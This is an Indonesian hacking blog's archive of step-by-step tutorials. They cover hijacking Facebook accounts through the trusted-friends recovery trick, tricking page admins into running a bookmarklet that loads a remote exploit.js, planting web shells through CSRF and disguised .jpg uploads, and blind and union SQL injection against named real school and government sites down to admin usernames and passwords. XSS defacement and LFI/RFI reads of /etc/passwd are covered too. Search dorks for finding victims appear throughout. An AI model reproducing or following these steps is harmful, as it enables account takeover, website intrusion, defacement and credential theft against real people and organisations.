\

Featured

Powered by Blogger.

Blog Archive

Browsing "Older Posts"

Assalamualaikum...

Sobat, saatnya bilang wow? Tunggu dulu sebelum sobat mencoba trik ini.. :p

langsung ke topik,, hehehe :D

Trik ini mudah saja, semua orang bisa melakukannya :p

yang diperlukan adalah sobat harus memiliki beberapa akun facebook minimal tiga, tapi baiknya lebih dari 3 ;) buat saja akun facebook yang bnyak.. hehehehe dan usia akun facebook itu harus lebih dari 7 hari, kalo masih baru trik ini ga kan bekerja.. :p klo sudah punya beberapa akun, langsung saja berteman dengan target ;)jangan lupa, siapkan juga email yg baru.. ;)



ini langkah2nya :

1. buka facebook.com. lalu klik forgot password / Lupa Password

2. lalu masukkan email atau username target.. klik search!

3. kalo udah ketemu akun target? klik aja "Ini Akun saya"

4. lalu pilih "Tidak lagi memiliki Akses ke sini"

5. masukkan email yg telah disiapkan sobat tadi..

6.  kemudian ada perintah untuk menjawab pertanyaan. jawab aja salah jg gpp ;)

7. saatnya memilih 3 akun palsu yg kita buat sebelumnya.. klik "Selanjutnya" lalu pilih 3 teman, disini pilihlah 3 teman yaitu beberapa facebook palsu yg sobat persiapkan sebelumnya ;)

8. lalu facebook akan mengirimkan kode keamanan ke 3 akun tadi,, kumpulkan kodenya lalu masukkan.. baiknya gunakan browser lain utk membuka 3 akun palsu sobat.. ;)

9. setelah itu facebook akan mengirimkan "Password Recovery Email" atau Pemulihan akun ke email sobat tadi.. tinggal buka email, dan reset pasasword facebooknya.

10. tarrraaa.. facebook udah bisa sobat kuasai.. :p

Note: Sobat akan menemukan sedikit perbedaan  dalam trik ini pada saat mencobanya, jadi gunakan pikiranmu untuk mengembangkannya lagi.. :p

Sekian Terimakasih ;)


UPDATE: Ini Trik lama, dan udah diperbaiki oleh pihak FB... 

Hack Facebook Menggunakan Trik 3 Teman Terpercaya

By admin → Friday, February 22, 2013
Selamat pagi aja,, salam berbagi..

Sekarang saya mau share sedikit tentang trik bagaimana cara hack fanspage. tapi sebelumnya saya tekankan bahwa "Akun facebook / Fanspage itu bisa di hack karna factor Human Error"..

oke langsung saja deh.. :)


Hal-hal yang perlu dipersiapkan:

1. Fanspage Exploit Download  Password: Lihat

2. Hostingan Gratis (idhostinger,nazuka,dll)

3. Script Untuk Menjalankan Exploit

4. Email ID Facebookmu

5. Gunakan Otak (Pintar2) ;)


Langkah-Langkah:

1. Edit exploit.js dengan notepad. cari bagian email ID, lalu ganti dengan email ID mu.. lalu save!

2. Buatlah Hostingan di hosting gratis, Silahkan baca Cara Membuat Hosting Gratis lalu upload exploit.js dan pastikan upload di public_html.. http://sitekamu.hostingan.com/exploit.js

3. Script untuk menjalankan Exploit.js yg sudah diupload di hostingan

javascript:(a = (b = document).createElement(“script”)).src = “http://sitekamu.hostingan.com/exploit.js“, b.body.appendChild(a); void(0)

Sekarang kamu hanya butuh mengirimkan kode Script itu kepada Admin page agar mau menjalankan kode script itu di halaman fanspagenya dengan mengkopy kode script lalu dipastekan di adressbar browser.  katakan saja ini Autolike Fanspage atau terserah gimana caranya membodohinya.. wkwkwk :p

Saran saja,, sebaiknya dicoba2 dulu karena saya tidak jamin exploit itu masih bekerja. mengingat sistem keamanan facebook yang terus diperketat.

sekian, terimakasih

Content Creator : Onix AQua


Cara Hack FansPage Facebook

By admin →

Hi, ketemu lagi sama ane ./Cyber404 ^_^

Kali ini aku mau kasih trik cara mendapatkan web yang 1 server sama web yang kita sudah pasang shell, kebanyakan nyebutnya CONFIG.

Ya udah tanpa mengulur waktu langsung saja kita masuk ke tutorialnya :D

[+] BAHAN [+]

  • Shell (kalau belum punya download disini)
  • MySQL (kalau belum punya klik download) #recode 




1. Siapkan website yang udah kalian tanami shell/backdoor :D (sebagai contoh saya memakai http://sariamelia.com )

2. Klik EVAL didalam shell/backdoor kalian (lihat gambar)


3. Jika sudah, lalu klik GO (lihat gambar)


4. Lalu copy semua yang terdapat dalam kolom tersebut (lihat gambar)


5. Next, kalian klik CONFIG (tampilan seperti ini)


6. Lalu, paste kode yang kalian dapat (step 4) tadi di kolom yang disediakan (lihat gambar)


7. Lalu klik HAJAR, jika sukses tampilan kurang lebih akan seperti ini


8. Sekarang tinggal kalian panggil CONFIGnya, caranya 

# Jika kalian upload shell tadi di wp-content maka manggilnya http://domain.com/wp-content/config
*intinya ganti (nama shell kamu tadi dengan "config")

9. Jika sukses, tampilan akan seperti ini


10. Sekarang tinggal upload script "mysql.php"nya :)



Sekian tutorial dari ane ./Cyber404 , kalo kurang jelas bisa tanyakan pada (./Cyber404)

#yang belum tau cara deface dengan config silahkan kesini gan :)

#Special Thanks To : Mr. Gandrunx | X Inject


Keyword : Hack Dengan Config . Cara Mencari Website Satu Server , Deface Website Mudah

Mencari Config Dalam Website

By admin →
Assalamualaikum :)
Pada kesempatan kali ini aku mau kasih tutorial deface dengan tekhnik CSRF, oke tanpa basa basi kita mulai yah :D

Bahan-Bahan:

1. Download Script CSRF
===============================================================
DOWNLOAD DISINI  Password: Lihat
===============================================================
Note: Aktifkan Java Script untuk download!!

2. Download MadspotShell Disini Extract dulu dari file Rar!

3. Cari target dengan DORK :
  • inurl:/wp-content/themes/shepard
  • inurl:/wp-content/themes/money
  • inurl:/wp-content/themes/clockstone
  • inurl:/wp-content/themes/ambleside
  • inurl:/wp-content/themes/pacifico
#Dork dikembangkan sendiri ya :)

4. Untuk coba2 gunakan Live Target & Live Target 2

5. Great Thanks To om Edo aka Mr. Goodday aka 007 Yg udh ngajarin :D

6. Titip Nama :: Indonesian Cyber Army ( IDCA ) | Stealth Defacer Hacking Team (SDHT)

#Persiapan sudah selesai, sekarang tinggal kita eksekusi :)

7. Download Video Tutorial | Pass : onixidca


Note: "Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"

Langkah- Langkah:

1. Masukan Dork ke dalam google (kurang jelas lihat gambar)


2. Pilih salah satu target yang kita dapat tadi (Kurang jelas lihat gambar)


Contoh :
http://www.robertcarpentry.com/wp-content/themes/pacifico/images/ ganti menjadi http://www.robertcarpentry.com/wp-content/themes/pacifico/theme

3. Klik folder "Function" lalu klik file "Upload-bg.php" / "uploadbg.php" / "upload.php"

Note: Jika muncul "You Must Login....."atau blank? cari target lain!! :p  "Jika muncul "error" berarti Web target Vulnerable" ;p

4. Buka file CSRF.html yang tadi sudah di download dengan notepad, ganti URLTARGET  dengan link yang berada di addres bar target kamu tadi. Lihat Gambar! lalu save!
Contoh: "http://www.robertcarpentry.com/wp-content/themes/pacifico/theme/functions/upload-bg.php"



5. Buka file CSRF.html, akan muncul upload file. lalu Pilih Madspotshell.php lalu klik upload .


Jika berhasil maka akan muncul seperti ini (lihat gambar)


6. Udah diganti ? dan jika berhasil maka tampilannya akan jadi seperti ini



#itu tandanya shell backdoor kamu sudah terpasang :D sekarang terserah mau kamu apain website itu :)

#Saya menggunakan SHELL dari teman saya om X Inject :D (tampilan shell akan berbeda beda loh setiap jenisnya)

Tampilan madspotshell::

7. Untuk eksekusi Index, silahkan lihat Cara Tebas Index Website Wordpress

Sekian tutor yang dapat saya berikan :)

kalo kurang jelas, boleh tanya kan pada ORANG CAKEP INI XD

Sekian :)

Keyword : Cara deface dengan CSRF , Deface Website Mudah , Cara deface website , Cara ampuh deface website

    Deface Dengan CSRF (Cross Site Request Forgery)

    By admin → Thursday, February 21, 2013
    Selamat siang semua, dari apda gak ada kerjaan mending nih ane share cara buat BOT Komentar :D

    Pertama tama kalian harus punya Hosting/Cpanel terlebih dahulu, kalo untuk percobaan sih pake hosting gratis aja :D ,

    #MAAF, UNTUK MASALAH HOSTING KALIAN COBA CARI SENDIRI YA :p

    Oke next, saya umpamakan kalian sudah punya hosting jadi bahan yang dibutuhkan selanjutnya yaitu SCRIPT BOT, untuk script bot kalian bisa ambil DISINI (Copas Semua)

    Untuk akses tokennya, kalian bisa ambil DISINI

    Contoh akses token : https://m.facebook.com/?_rdr#access_token=AAAAAC3zphqEBAJd8dlZCnizM6k2JsB3RTlpHafKIGLyeiEPmZBFp3zz9sk0ZB4DV90ur7kE4ZAv6rxnA0TF6hZCcpHn5ZCMSYNUMZCWADwVhQZDZD&expires_in=0

    #Yang berwarna merah adalah akses tokennya

    Oke, untuk pemasangan nih kalian bisa lihat DISINI

    Untuk CRON JOB kalian bisa ke http://www.webcron.org

    sekian tutor semrawut dari ane :D

    #Nb : setelah selesai mengambil token, segera hapus aplikasi pengambilan akses token (DISINI)

    KALO GAGAL JUGA, BOLEH PM SAYA DISINI

    trimakasih,

    Keyword : Cara Membuat Bot Like, Cara Membuat Bot Komentar, Cara Mudah Buat BOT Komentar, BOT Auto Like dan Komentar

    Membuat Setan Facebook (BOT KOMENTAR)

    By admin →
    Langsung saja ;) 
     
    Dork    :
    inurl:"/?ptype=post_listing"
    inurl:"/?ptype=post_event"
    inurl:"/?page=property_submit"
    intext:"Geo Places Theme by"
    intext:"(You can upload more than one images to create image gallery on detail page)"
     

    Site::
    - http://site.com/?ptype=post_listing
    - http://
    site.com/?ptype=post_event
    - http://
    site.com/path/?ptype=post_listing
    - http://
    site.com/path/?ptype=post_event
     
    Sebelumnya Rename dulu Shellmu jadi ext. jpg
    cth: shell.php.jpg / shell.php;.jpg
    Upload shellmu,, gunakan tamper data.  Silahkan Lihat Cara Tamper Data (Upload PHP File) 
     
     
    Hasilnya bisa dilihat
    - http://
    site.com/wp-content/themes/GeoPlaces/images/tmp/[shellmu]
    - http://
    site.com/path/wp-content/themes/GeoPlaces/images/tmp/[shellmu]
     
    Video Tutorial 
      
      

    Cara Deface Dengan Shell upload vulnerability

    By admin → Wednesday, February 20, 2013
    Untuk mengupload PHP Shell ini kita biasanya mencari fasilitas upload file.php , nah yang jadi pertanyaan kalau web target hanya mendukung file.jpg untuk di upload gimana ? Nah itu yang akan saya sharing tekhniknya. Tahap-tahapnya seperti berikut ini. Tapi dengan catatan anda telah menguasai website target dengan tekhnik : sql injection , LFI / RFI , atau exploit.

    1. Siapkan dulu file shell.php seperti : C99Shell, r57, atau lainya cari aja di google banyak :D
    2. Rename dengan nama : shell.php.jpg
    3. Install add ons Tamper Data dulu di browser mozilla kita, Download disini :D
    4. Restart dan kita mulai upload
    5. Cari fasilitas uploads gambar pada website target, kemudian tamper data kita jalankan



    6. Trus Uploads shell.php.jpg kita dan tamper :D


    7. Setelah langsung jalankan tamper datanya, tunggu pop out dari tamper data muncul , cari file shell.php.jpg dan rename path shell.php.jpg menjadi shell.php ! ingat yah :D


    Sekarang anda tinggal cari dimana file shell anda berada .
    Dan buka path shell.php anda di url browser dan siap meluncur ke TKP. Tapi inget, gak semua web target bisa kita lakukan dengan tekhnik ini .Kalau gak berhasil , silahkan hubungi adminnya aja langsung :D :D

    Cara Tamper Data (Upload PHP file)

    By admin →
    Ane akan mencoba menjelaskan semudah mungkin tentang Blind SQL Injection yang ane anggap rumit banget... Bukannya sok ngajarin atau apalah, disini ane hanya berusaha memberikan apa yang ane punya dan bisa...

     Apa sich Blind SQL Injection tu?



    Blind SQL Injection adalah salah satu tehnik exploitasi database yang berbeda dengan sql injection biasa dimana pada sql injection biasa akan mengeluarkan sebuah value akan tetapi pada tehnik blind sql injection tidak akan mengeluarkan value apapun akan tetapi kita akan mengetahui value tersebut dengan trial and error akan value tersebut / menguji true atau falsenya value tersebut...

    disini GT memakai command :

    mid()= hampir sama fungsinya dengan substring()
    char()= adalah peubah dari karakter

    lanjut..

    ingat..sebelum mencoba,kita cek version sql nya..cara cek ada d tutorial sql inject yg satu lg..
    kalau version 4..kita tidak memakai blind,karena v4 tidak support query information_schema

    kalau version 5,boleh pake ini,boleh pake sql inject yg biasa..wkwkwkw

    lanjut...

    Target: www.smanti.com (thx to bejamz udah ngasih target :)

    1.PENGETESAN BUG

    Seperti biasa..ikuti langkah sebelumnya,seperti di tutorial SQL Inject biasa..cari halaman yng dinamis,sisipkan and 1=0 dan and 1=1


    www.smanti.com/berita.php?id=5 and 1=0 <<<false

    www.smanti.com/berita.php?id=5 and 1=1 <<<true

    eh ternyata ada bug nya...

    lanjut....

    2.BLIND INJECT

    Query yg dipakai: and mid(user(),1,1)=CHAR(65)

    saya jelaskan sedikit deh..

    mid(user()1,1) = dalam kasus ini kita tidak tahu value dari user itu apa maka dalam "()" kita kosongkan dan angka 1,1 dibelakang () adalah urutan dari value tersebut

    sedangkan CHAR adalah peubah dalam decimal dan (65) adalah value decimal tersebut.
    kenapa kita mulai dengan 65 ?
    karena "65" adalah "A" dalam ascii...

    lanjut..

    mari kita masukkan

    www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(65)

    ternyata hasilnya masih false (beritanya hilang)

    berarti value yg kita masukkan salah..

    tinggal tambah value na..jadi..

    www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(66) <<masih false

    www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(67) <<masih false

    www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(68) <<masih false

    www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(69) <<masih false juga..

    dst sampe kita menemukan keadaan true(beritanya muncul kembali)

    kebetulan ada di char(83)

    www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(83)  <<akhirnya true..

    cape?masih kuat?hahaha..trial n error...

    lanjut..

    kita tambain value na..

    www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,65)

    adakah perbedaan nya?

    yap,angka pada user kita naikkan menjadi 2 dan kita menambahkan value char kembali,dari 65..

    gini nih..

    1,1 = value pertama user
    1,2 = value kedua user
    1,3 = value ketiga user
    dst
    dan 83 adalah nilai true,lalu kita tambahkan..

    www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,65)

    www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,66)

    www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,67)

    dst.. sampe dpet yg true..

    ternyata yg true ngumpet di value 77

    www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,77)


    lanjutin trus langkah2na..

    cari value k 3 user..

    www.smanti.com/berita.php?id=5 and mid(user(),1,3)=CHAR(83,77,65)

    eh langsung ktemu..hehehe..

    lanjut value k 4..

    www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,65)


    www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,66)


    www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,67)

    ternyata ktemu di value 78..

    www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,78)

    lanjut trus aja...

    cape gw..


    pokoknya..setelah dapet smua..kita convert char yang tadi di ke ascii table

    www.piclist.com/techref/ascii.htm

    stelah d convert,ternyata 83 77 65 78 tuh d ascii adalah SMAN

    nah udah hampir ktebak user name nya..kerjain ndiri y..okey

    nah..gmana kalo mw dapet password na?

    kita rubah value
    user() menjadi database() dan ulangi tahap2 diatas hingga mendapat semua value yang true..

    jadi


    www.smanti.com/berita.php?id=5 and mid(database(),1,1)=CHAR(65)

    cari lagi..sama kayak cari user tadi..harus sabar..

    ulangi sampai dapat true ..

    tambain value na..wkwkwkw..

    dan rubah value database() untuk mencari value lainnya..

    hingga mendapat admin password dan db password
    .
    metode blind sql injection seperti ini membutuhkan kesabaran dan ketelitian attacker untuk mendapatkan value yg tepat..(true)

    akan tetapi metode ini hingga sekarang cukup efektif untuk web yang telah menfilter celah sql injection...hehehe...

    Sumber : Hacker Newbie

    Blind SQL Injection

    By admin → Saturday, February 16, 2013
    Udah lama ngga posting tentang tutor defacing website hehee, Sekarang saya akan sempatkan membahas tentang Cyber Gravity lagi nih... yaitu Cara Deface Website Menggunakan Teknik XSS Vulnerability.

    Sebelumnya udah pada tau belum apa itu XSS Vulnerability? XSS Vulnerability adalah suatu cara memasukan code/script HTML kedalam suatu website dan dijalankan melalui browser di client. Ok deh, Langsung aja kita bahas bersama Cara Deface Website Menggunakan Teknik XSS Vulnerability ini !

    1). Pertama, Masukan Dorknya :

    inurl:"/showcatrows.php?CategoryID="

    http://cirebon-cyber4rt.blogspot.com/2012/06/cara-deface-website-menggunakan-teknik.html

    2). Kalo sudah, Pilih salah satu web yang akan kita deface.

    Contoh : saya pakai web ini http://www.examsolutions.co.uk/...?CategoryID=13

    http://cirebon-cyber4rt.blogspot.com/2012/06/cara-deface-website-menggunakan-teknik.html

    3). Jika sudah masuk ke halaman web target, kita modifikasi sedikit URL web target dengan menambahkan tanda " dan > setelah angka, tepatnya pada akhir URL. Lalu tambahkan kode HTML deface kita.

    Contoh : http://www.examsolutions.co.uk/...?CategoryID=13"><marquee><h1>Hacked by Cirebon-Cyber4rt</h1></marquee>

    4). Kemudian tekan Enter.

    http://cirebon-cyber4rt.blogspot.com/2012/06/cara-deface-website-menggunakan-teknik.html

    5). Selesai, Website sudah berhasil kita deface :D

    Triknya memang cukup simpel, dimana kita memanfaatkan celah keamanan pada XSS sebuah website dengan memasukan sebuah code/script HTML.

    Sekian tutorial deface website kali ini dari saya, semoga artikel tentang Cara Deface Website Menggunakan Teknik XSS Vulnerability ini dapat bermanfaat bagi sobat.

    Source: Hacker Newbie

    Cara Deface Website Menggunakan Teknik XSS Vulnerability

    By admin →
    Dalam artikel saya kali ini, saya akan menerangkan sedikit tentang apa itu Web Shell. Sebenarnya saya sudah sering dengar hal ini sejak dulu, tapi baru sekarang saya mempelajarinya, dan baru sempat posting saat ini.

    Web Shell, seperti namanya yaitu Shell yang berada dalam Web. Web Shell ini adalah sekumpulan script, yang dapat mengeksekusi perintah shell. Seperti yang terkenal saat ini adalah C99, r57, bypass, dan masih banyak lagi.

    Untuk setiap web shell akan berbeda-beda, sesuai dengan Web Server yang dipakai. Misal jika server menggunakan Apache (biasanya PHP), maka webShell dalam berntuk PHP Script, begitu pula dengan ASP, PERL, CGI, dll.

    Kali ini saya tidak akan menunjukan, bagaimana cara memasukan webShell tersebut ke server yang mau dihack. Saya disini hanya akan mencobanya pada server sendiri, dan untuk melihat, seberapa besarkah efek yang ditimbulkan C99 ini. :)
    Jika anda tertarik untuk bisa mengUpload webShell ini pada server korban, maka anda bisa menggunakan tehnik RFI ( Remote File Inclusion), yang tentunya anda tinggal mencari saja tutorialnya di Google.
    Tested Web Shell,
    Un-Tested Web Shell,
    Sesudah itu taruh file tersebut dalam Direktori Web Server anda dalam format PHP/ASP/CGI, sesuaikan dengan tipe webShell. Dan kunjungi melalui webBrowser, misalnya seperti berikut.
    http://www.sitetarget.com/c99.php
     
    Berikut beberapa screen shoot dari web shell tersebut,

     
    [ C99 from Russia ]
     
    [ ANI SHELL from India ]
     
    [ B374k 2.1 from Indonesia ]
     
    [ ZACO WebShell support POST Method ]

    Apa itu Web Shell ?

    By admin → Thursday, February 14, 2013
    Buat yg belum tau aja yhaa... klo yg udh jago, mending ga ush di baca... drpd buang2 waktu :tongue:

    Sebelumnya apa sih LFI dan RFI itu??

    LFI (Local File Inclusion) adalah sebuah lubang pada site di mana attacker bisa mengakses semua file di dalam server dengan hanya melalui URL.
    RFI (Remote File Inclusion) adalah sebuah lubang dimana site mengizinkan attacker meng-include-kan file dari luar server.

    Penjelasan
    fungsi-fungsi yang dapat menyebabkan LFI/RFI:


    Code:
    include();
    include_once();
    require();
    require_once();

    Dengan syarat pada konfigurasi php di server:
    allow_url_include = on
    allow_url_fopen = on
    magic_quotes_gpc = off

    contoh:
    misalkan kita punya file index.php dengan content kodenya seperti ini,


    Code:
    <?php
      include "../$_GET[imagefile]";
      ?>

    misal $imagefile=image.php
    mungkin di url akan terlihat seperti ini bentuknya

    Code:
    http://www.[target].com/index.php?imagefile=image.php
    maka script ini akan menampilkan halaman image.php.


    nah disini attacker akan dapat melakukan LFI karena variable imagefile di include begitu saja tanpa menggunakan filter.
    misalnya attacker ingin mengakses file passwd yang ada pada server, maka dia akan mencoba memasukan seperti ini ../../../../../../../../../etc/passwd << dengan jumlah "../" itu tergantung dari kedalaman folder tempat file index.php tersebut.. dengan begitu isi file passwd akan ditampilkan di browser. kita bisa menggunakan metode menebak struktur folder dalam website target :lol:

    tapi seandainya terdapat error seperti di bawah ini:

    Warning: main(../../../../../../../../../etc/passwd.php) [function.main]: failed to open stream: No such file or directory in /their/web/root/index.php on line 2
    liat pada passwd ternyata dia ditambah dengan extensi ".php" berarti code yang digunakan untuk include adalah seperti ini

    Code:
    Code:

      <?php
      include($_GET[imagefile].".php");
      ?>

    nah untuk dapat mengelabui script tersebut kita bisa menggunakan (dengan syarat magic_quotes_gpc = off) jadi dibelakang /etc/passwd kita tambahkan seperti

    http://www.[target].com/index.php?imagefile=../../../../../../../../../etc/passwd

    lalu untuk apa ? yaitu untuk menghilangkan karakter apapun setelah passwd.
    * ini disebut null injection.

    Nah kita sudah menemukan bug LFI pada website target, sekarang kita coba cari bug RFI dengan menambahkan link file remote (dari luar website) pada variable imagefile. misalnya:

    http://www.[target].com/index.php?imagefile=http://www.[remote].com/evil.txt

    dengan file evil.txt misal berisi "hacked by n4is3n"

    jika ternyata di browser menampilkan kalimat tersebut berarti website tersebut vulner terhadap bug RFI juga.


    Pencegahan
    Nah sekarang saatnya untuk pencegahan kedua bug tersebut, yaitu
    1. Memvalidasi variable.
    2. Mengkonfigurasi kembali settingan php pada server website Anda.
    allow_url_include = off
    allow_url_fopen = off
    magic_quotes_gpc = on
    3. pada include mungkin bisa ditambahkan "./"
    jadinya seperti ini,

    Code:
    include("./"$_GET[imagefile].".php");

    maksudnya dengan seperti itu, saat kita mengakses file dari luar server maka hasilnya akan error karena saat pemrosesan setiap file yang masuk ke variable page akan ditambah ./ di depannya.

    http://www.[target].com/index.php?imagefile=http://www.[remote].com/evil.txt

    dengan seperti ini server atau website yang diinject akan mencari file http://www.[remote].com/evil.txt dan pastinya akan menyebabkan server menampilkan error bahwa tidak ditemukannya file tsb.

    Semoga tutor sederhana dan sangat awam ini (Maklum, yg nulis jg msh awam) bermanfaat.

    Sumber: Hacker Newbie

    Tutor singkat RFI & LFI

    By admin →
    langsung aja yahh..
    deface palsu via sql injection?
    maksudnya?
    buat yg master,jgn d baca yahhh...
    cm niat utk share kok...hhe ..

    pertama,jadi yg kita lakuakn cm deface palsu...deface yg hanya bs d baca dr sisi client,seperti XSS..
    gmn crnya ?
    lnjut ..

    1.Siapin target ,mau SQL versi 4 atau versi 5 jg boleh.
    kl lupa nihh

    Code:
    http://hacker-newbie.org/showthread.php?tid=97

    2.nah misal ud dpt target nihh..
    Code:
    http://www.stmikpontianak.ac.id/news.php?id=-70 union select 1,2,3,4,5,6,7,8,9--

    3.cek versinya...
    Code:
    http://www.stmikpontianak.ac.id/news.php?id=-70 union select 1,2,@@version,4,5,6,7,8,9--

    eh ternyata versi 4..
    drpd cape ngeblind..
    yaudah buat gaya2an..deface palsu ajaa..
    kalian tw kan yg ngerubah ascii jd hex code?
    kl bingung,
    buka ini
    Code:
    http://dieq41.com/tools/text.html
     
    nah coba buat script deface,misal
    Code:
    <h1>hacked by me</h1>
     
    masukin ke bagian ASCII yg ada d web dieq41..
    trus kl ud d masukin..
    liat bagian hexadecimal,bakal muncul:

    Code:
    3C68313E6861636B6564206279206D653C2F68313E

    nah kode d atas tuh kodehasil convert dr ascii ke hex..

    nah,,skrg yg kode 3C68313E6861636B6564206279206D653C2F68313E ditambah 0x d depannya ...jadi

    Code:
    0x3C68313E6861636B6564206279206D653C2F68313E

    oke,coba masukin d angka 3 ,yg script hex nyaa..
    Code:
    http://www.stmikpontianak.ac.id/news.php?id=-70 union select 1,2,0x3C68313E6861636B6564206279206D653C2F68313E,4,5,6,7,8,9--

    ew.kok ada hacked by me?
    hhe..itu tandanya udah berhasil sob..

    makanya ak bilang ini cm client aja..
    ask : kl mau deface bneran?
    yaudah gawei dewek ..kan ad tutor sql injectionnya tuh..

    ok sob smua,makasih2.

    Sumber:: Hacker Newbie

    Deface Palsu via SQL Injection

    By admin →

    Pengertian SQL Injection 

    SQL Injection merupakan sebuah teknik hacking dimana seorang penyerang dapat memasukkan perintah-perintah SQL melalui url untuk dieksekusi oleh database. Penyebab utama dari celah ini adalah variable yang kurang di filter : 

    id=$id;……. > Got Error

    Hal pertama yang harus kita lakukan adalah mengetahui apakah situs tersebut terkena celah SQL Injection atau tidak, yaitu dengan membuat sebuah error dengan menambahkan karakter ‘ setelah atau sesudah angka pada url.


    Contoh : 

    http://situstarget.com/news.php?id=1’ 
    http://situstarget.com/news.php?id=’1

    Pertama kita cari dulu website yang memiliki celah SQL Injection. silahkan sobat cari target di google dengan menggunakan dork.

    Dork SQLi :


    inurl:azerty.php?id= ,
    inurl:bouquin.php?id= ,
    inurl:lien.php?id= ,
    inurl:clavier.php?id=
    inurl:index.php?id=
    inurl:trainers.php?id=
    inurl:buy.php?category=
    inurl:article.php?ID=
    inurl:play_old.php?id=
    inurl:games.php?id=
    inurl:iniziativa.php?in=
    inurl:curriculum.php?id=
    inurl:labels.php?id=
    inurl:story.php?id=
    inurl:look.php?ID=
    inurl:newsone.php?id=
    inurl:aboutbook.php?id=
    inurl:material.php?id=
    inurl:opinions.php?id=
    inurl:announce.php?id=
    Disini saya sudah menemukan targetnya : http://diklat.lampungprov.go.id/more.php?id=1



    Kemudian kita akan mencari dan menghitung jumlah tabel yang ada pada database web tersebut. silahkan sobat gunakan perintah : order by 1 - dan seterusnya sampai terjadi error pada halaman. gunaka tanda + sebagai spasi, dan pada akhir perintah gunakan tanda --.

    http://diklat.lampungprov.go.id/more.php?id=1+order+by+1-- < No Error
    http://diklat.lampungprov.go.id/more.php?id=1+order+by+2-- < No Error
    http://diklat.lampungprov.go.id/more.php?id=1+order+by+3-- < No Error
    http://diklat.lampungprov.go.id/more.php?id=1+order+by+4-- < No Error
    http://diklat.lampungprov.go.id/more.php?id=1+order+by+5-- < No Error [Terlalu banyak diSkip aja]
    http://diklat.lampungprov.go.id/more.php?id=1+order+by+17-- < No Error

     
    http://diklat.lampungprov.go.id/more.php?id=1+order+by+18-- < Error



    Pada angka 18 ternyata muncul error, jadi yang kita ambil angka sebelum munculnya pesan error. itu berarti jumlah tabel pada databasenya ada 17.


    Selanjutnya kita akan mencari angka tabel yang bisa kita gunakan untuk perintah2 injection pada tahap selanjutnya. Gunakan perintah union select diikuti jumlah tabel dan tanda - sebelum angka dan diakhiri dengan tanda --. contoh:

    http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--



    Disini bisa kita lihat bahwa angka yang muncul yaitu 16 dan 17. kedua angka tersebut nantinya yang akan kita masukkan perintah2 selanjutnya.


    Pada tahap Selanjutnya kita akan mengetahui versi database yang dipakai oleh web tersebut. gunakan perintah "version()" atau "@@version".
    contoh:
    http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,@@version,17--




    Nah pada gambar kita bisa lihat versi database yang dipake adalah v.5.5.14, jadi pada versi 5 itu berberda dengan versi 4. prosesnya lebih repot pada versi 4, karena untuk melakukan perintah2 SQLi pada versi 4 kita harus menebak 1 per 1 tabel yang ada pada databasenya.

    Sekarang perintah selanjutnya kita akan memunculkan nama-nama tabel yang ada pada web tersebut. gunakan perintah “group_concat(table_name)” dan menambahkan perintah “from+information_schema.tables+where+table_schema=database()" sesudah angka terakhir, dan diakhiri dengan tanda --.
    contoh :
    http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(table_name),17+from+information_schema.tables+where+table_schema=database()--


    Disitu kita dapatkan nama-nama tabelnya sperti : tbadmin, tbbukutamu, tbcontent, tbcounter, tbdivisi, tbgolongan, tbjadwal, dll. Langkah selanjutnya kita akan mencari username dan password admin pada tabel tbadmin. Perlu diketahui bahwa tidak semua nama tabel pada setiap web itu sama, jadi untuk mencari tabel admin, silahkan sobat kira-kira saja dimana tabel yang sobat curigai tempat username dan password admin berada. Kemudian untuk mengeluarkan isi yang ada pada kolom tbadmin gunakan perintah berikut: “group_concat(columns_name) ” dan perintah “from+information_schema.columns+where+table_name=CHAR()" sesudah angka terakhir, dan diakhiri dengan tanda --. Pada tahap ini nama tabel tbadmin harus dikonversi dulu ke bentuk decimal :) silahkan sobat gunakan toolsnya DISINI. kemudian hasil konversi tbadmin adalah 116 98 97 100 109 105 110 lalu kita masukkan ke CHAR(116, 98, 97, 100, 109, 105, 110) dan pisahkan dengan koma. jadi perintahnya seperti berikut:

    http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(column_name),17+from+information_schema.columns+where+table_name=CHAR(116, 98, 97, 100, 109, 105, 110)--


    Nah disitu muncul kolom username, pswd, status. lalu langkah selanjutnya kita akan melihat isi dari kolom kolom yang muncul tadi dengan menambah perintah group_concat(username,0x3a,pswd,0x3a,status) . jangan lupa di setiap sela2 tambahkan kode 0x3a yg merupakan hasil konversi hexa dari tanda titik dua ( : ). lalu tambahkan perintah  +from+tbadmin--, tbadmin merupakan tabel yang kita dapatkan tadi.

    http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(username,0x3a,pswd,0x3a,status),17+from+tbadmin--



    Nah kan udah keliatan username dan passwordnya.. :) dari gambar muncul data :
